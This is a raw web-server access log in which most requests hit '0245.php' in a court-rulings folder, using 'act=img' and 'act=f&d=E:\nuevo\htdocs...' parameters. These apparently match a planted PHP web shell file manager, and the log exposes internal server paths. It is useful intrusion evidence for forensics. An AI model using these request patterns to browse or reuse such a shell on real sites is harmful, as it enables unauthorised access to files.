47.128.31.162 - - [15/Mar/2024:02:29:59 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_diz HTTP/1.1" 200 1027
47.128.31.162 - - [15/Mar/2024:02:29:59 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_pdf HTTP/1.1" 200 1034
47.128.31.162 - - [15/Mar/2024:02:29:59 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_exe HTTP/1.1" 200 118
47.128.31.162 - - [15/Mar/2024:02:29:59 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_gif HTTP/1.1" 200 175
47.128.31.162 - - [15/Mar/2024:02:29:59 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_txt HTTP/1.1" 200 132
47.128.31.162 - - [15/Mar/2024:02:29:59 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_html HTTP/1.1" 200 230
47.128.31.162 - - [15/Mar/2024:02:29:59 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_ini HTTP/1.1" 200 134
47.128.31.162 - - [15/Mar/2024:02:29:59 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_rtf HTTP/1.1" 200 164
47.128.31.162 - - [15/Mar/2024:02:29:59 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=download HTTP/1.1" 200 161
47.128.31.162 - - [15/Mar/2024:02:29:59 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=change HTTP/1.1" 200 290
47.128.40.91 - - [15/Mar/2024:02:30:22 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021&f=0240.pdf HTTP/1.1" 200 3036
47.128.40.91 - - [15/Mar/2024:02:30:23 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_gif HTTP/1.1" 200 175
201.245.192.253 - - [15/Mar/2024:02:30:23 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d60c378208792d4757a508e4811830dca4.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
47.128.40.91 - - [15/Mar/2024:02:30:23 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_pdf HTTP/1.1" 200 1034
47.128.40.91 - - [15/Mar/2024:02:30:23 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_txt HTTP/1.1" 200 132
47.128.40.91 - - [15/Mar/2024:02:30:23 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_html HTTP/1.1" 200 230
47.128.40.91 - - [15/Mar/2024:02:30:23 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_diz HTTP/1.1" 200 1027
47.128.40.91 - - [15/Mar/2024:02:30:23 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_exe HTTP/1.1" 200 118
47.128.40.91 - - [15/Mar/2024:02:30:23 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=change HTTP/1.1" 200 290
47.128.40.91 - - [15/Mar/2024:02:30:23 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_rtf HTTP/1.1" 200 164
47.128.40.91 - - [15/Mar/2024:02:30:23 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=download HTTP/1.1" 200 161
47.128.40.91 - - [15/Mar/2024:02:30:23 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_ini HTTP/1.1" 200 134
172.22.2.4 - - [15/Mar/2024:02:28:57 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 56779
47.128.113.153 - - [15/Mar/2024:02:30:46 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021&f=2473.pdf HTTP/1.1" 200 3036
47.128.113.153 - - [15/Mar/2024:02:30:47 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_diz HTTP/1.1" 200 1027
47.128.113.153 - - [15/Mar/2024:02:30:47 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_html HTTP/1.1" 200 230
47.128.113.153 - - [15/Mar/2024:02:30:47 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_txt HTTP/1.1" 200 132
47.128.113.153 - - [15/Mar/2024:02:30:47 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_gif HTTP/1.1" 200 175
47.128.113.153 - - [15/Mar/2024:02:30:47 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_exe HTTP/1.1" 200 118
47.128.113.153 - - [15/Mar/2024:02:30:47 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_pdf HTTP/1.1" 200 1034
47.128.113.153 - - [15/Mar/2024:02:30:47 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_ini HTTP/1.1" 200 134
47.128.113.153 - - [15/Mar/2024:02:30:47 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=download HTTP/1.1" 200 161
47.128.113.153 - - [15/Mar/2024:02:30:47 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_rtf HTTP/1.1" 200 164
47.128.113.153 - - [15/Mar/2024:02:30:47 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=change HTTP/1.1" 200 290
47.128.111.85 - - [15/Mar/2024:02:31:09 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021&f=1837.pdf HTTP/1.1" 200 3037
47.128.111.85 - - [15/Mar/2024:02:31:10 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_html HTTP/1.1" 200 230
47.128.111.85 - - [15/Mar/2024:02:31:10 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_diz HTTP/1.1" 200 1027
47.128.111.85 - - [15/Mar/2024:02:31:10 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_pdf HTTP/1.1" 200 1034
47.128.111.85 - - [15/Mar/2024:02:31:10 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_txt HTTP/1.1" 200 132
47.128.111.85 - - [15/Mar/2024:02:31:10 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_gif HTTP/1.1" 200 175
